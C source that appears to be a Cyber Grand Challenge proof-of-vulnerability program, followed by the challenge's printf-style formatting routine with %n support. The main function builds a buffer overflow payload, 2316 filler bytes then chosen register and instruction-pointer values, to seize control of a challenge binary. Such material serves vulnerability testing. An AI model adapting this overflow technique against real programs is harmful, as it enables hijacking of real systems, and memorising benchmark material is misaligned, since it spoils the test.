int main(void) { negotiate_type1(0xfefefefe, 0xfefefefe, 5); int i, buf_len = 0; char buf[32], *pbuf; unsigned char exploit[4096]; unsigned char *eip = NULL, *reg = NULL; unsigned int eip_len = 0, reg_len = 0, exp_len = 0; char *key = " !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~"; transmit_all(STDOUT, "2\n", 2); transmit_all(STDOUT, key, 95); eip = append_var("TYPE1_IP", eip, &eip_len); reg = append_var("TYPE1_REG", reg, ®_len); memset(exploit, 0, sizeof(exploit)); bio_t *bio = bit_new(exploit); for (i = 0; i < 2316; ++i) { bit_write(bio, '\x00', 1); bit_write(bio, '\x41', 8); } for (i = 0; i < 4; ++i) { bit_write(bio, '\x00', 1); bit_write(bio, reg[i], 8); } for (i = 0; i < 4; ++i) { bit_write(bio, '\x00', 1); bit_write(bio, eip[i], 8); } exp_len = bio->didx + !!(bio->bidx > 0); pbuf = _print_signed(buf + 32, &buf_len, exp_len + 4); transmit_all(STDOUT, pbuf, buf_len); transmit_all(STDOUT, "\n", 1); buf_len = 2316 + 4 + 4; transmit_all(STDOUT, (char *)&buf_len, 4); transmit_all(STDOUT, exploit, exp_len); return 0; }
static int _printf(consumer_t consumer, void *arg, const char *fmt, va_list ap) { char tmpbuf[32]; /* must be at least 32 bytes for _print_base */ const char *fmtstr = NULL; char modifier = 0; int n, total = 0; #define CONSUME(b, c) \ do { \ size_t tmp = (size_t)(c); \ if (tmp == 0) break; \ total += (n = consumer(arg, (b), tmp)); \ if (n < 0) goto error; \ if (n < tmp) goto done; \ } while (0) #define FLUSH() \ do { \ if (fmtstr) { \ CONSUME(fmtstr, fmt-fmtstr); \ fmtstr = NULL; \ } \ } while (0) while (*fmt) { int flags = 0; #define FLAG_ZERO_PADDING 0x01 unsigned int field_width = 0; if (*fmt != '%') { if (fmtstr == NULL) fmtstr = fmt; fmt++; continue; } FLUSH(); fmt++; if (*fmt == '%') { CONSUME(fmt, 1); fmt++; continue; } /* process flags */ while (1) { switch (*fmt) { case '0': flags |= FLAG_ZERO_PADDING; fmt++; break; default: goto flags_done; } } flags_done: /* process field width */ field_width = strtoul(fmt, (char **)&fmt, 10); /* process modifiers */ switch (*fmt) { case 'H': case 'h': case 'l': modifier = *fmt; fmt++; break; } /* process conversion */ char *tmpstr; int base, outlen, sv; unsigned int uv; void *pv; switch(*fmt) { case 'd': case 'i': sv = va_arg(ap, int); if (modifier == 'h') sv = (short)(sv & 0xffff); else if (modifier == 'H') sv = (signed char)(sv & 0xff); tmpstr = _print_signed(tmpbuf + 32, &outlen, sv); while (field_width > outlen) { CONSUME((flags & FLAG_ZERO_PADDING) ? "0" : " ", 1); field_width--; } CONSUME(tmpstr, outlen); fmt++; break; case 'u': case 'o': case 'x': case 'X': if (*fmt == 'u') base = 10; else if(*fmt == 'o') base = 8; else base = 16; uv = va_arg(ap, unsigned int); if (modifier == 'h') uv &= 0xffff; else if (modifier == 'H') uv &= 0xff; tmpstr = _print_base(tmpbuf + 32, &outlen, uv, base, *fmt == 'X'); while (field_width > outlen) { CONSUME((flags & FLAG_ZERO_PADDING) ? "0" : " ", 1); field_width--; } CONSUME(tmpstr, outlen); fmt++; break; case 'n': pv = va_arg(ap, void *); if (modifier == 'h') *(short int *)pv = total; else if (modifier == 'H') *(signed char *)pv = total; else *(int *)pv = total; fmt++; break; case 's': pv = va_arg(ap, void *); CONSUME((char *)pv, cgc_strlen((char *)pv)); fmt++; break; } } FLUSH(); done: return total; error: return -1; }